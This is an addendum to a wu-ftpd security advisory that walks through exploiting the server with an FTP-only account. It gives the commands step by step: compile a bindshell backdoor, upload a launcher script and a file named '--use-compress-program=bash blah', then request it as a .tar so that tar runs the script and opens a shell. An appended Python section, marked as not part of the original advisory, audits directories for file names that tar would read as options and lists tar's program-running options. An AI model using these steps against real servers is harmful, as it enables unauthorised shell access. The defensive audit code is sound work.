suid@suid.kg - an addendum to wu-ftpd configuration vulnerability exploit information

Background:

	In the initial advisory I mentioned that users with valid FTP-access-only accounts may also
	execute arbitrary code. I did not, however, include exploit information for this. This information is
	now found below.

Exploit Information:

	With a valid FTP-only account on the server, the difficulty goes right down. You also have the added
	benefit of not being stuck in a chroot() environment at the end. Local exploit time.

	The exploit goes along much the same lines as the anonymous FTP exploit does:

	Create a backdoor, using bindshell from our previous example:

	$ gcc bindshell.c -o b -static

	If you can perform a SITE CHMOD (default for normal non-anon users on wu-ftpd), then you can
	use the following script example. Create a script to exec the desired commands:

	$ cat > blah
	#!/bin/bash
	./b &
	^D

	Now create an empty file named "--use-compress-program=bash blah":

	$ > "--use-compress-program=bash blah"

	FTP to your target and log in with your username/password. Upload your 3 files:

	ftp> put b
	ftp> put blah
	ftp> put "--use-compress-program=bash blah"

	Do a SITE CHMOD for b and blah:
	
	ftp> quote SITE CHMOD 0755 b
	ftp> quote SITE CHMOD 0755 blah
	
	Now get your file:

	ftp> get "--use-compress-program=bash blah".tar

	That's all there is to it. You should now have a shell on whatever port you specified.

	Merry Christmas!
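
Defensive check, added here as an example (it is not part of the original advisory and is not wu-ftpd code): an audit of an FTP-writable tree for file names that tar would parse as options, plus a tar argument list that ends option parsing with "--". It assumes the ".tar" retrieval above hands the requested name to tar as a command-line argument; the function names and the sample directory are constructed for illustration.

```python
import os
import tempfile

# GNU tar options that make tar run an external program.
EXEC_OPTIONS = ("--use-compress-program", "--rsh-command",
                "--to-command", "--checkpoint-action")


def classify(name):
    """Return 'exec-option', 'option-like' or None for one file name."""
    if not name.startswith("-"):
        return None
    # -I is the short form of --use-compress-program.
    if name.startswith(EXEC_OPTIONS) or name.startswith("-I"):
        return "exec-option"
    return "option-like"


def audit_tree(root):
    """Walk root and return sorted (relative_path, verdict) for risky names."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            verdict = classify(name)
            if verdict:
                rel = os.path.relpath(os.path.join(dirpath, name), root)
                findings.append((rel, verdict))
    return sorted(findings)


def safe_tar_argv(member):
    """Build a tar argv in which member can never be parsed as an option."""
    return ["tar", "-c", "-f", "-", "--", member]


def demo():
    # Constructed sample tree standing in for an FTP user's home directory.
    with tempfile.TemporaryDirectory() as root:
        for name in ("b", "blah", "--use-compress-program=bash blah", "-notes.txt"):
            open(os.path.join(root, name), "w").close()
        return audit_tree(root)


if __name__ == "__main__":
    for path, verdict in demo():
        print(f"{verdict:12} {path!r}")
```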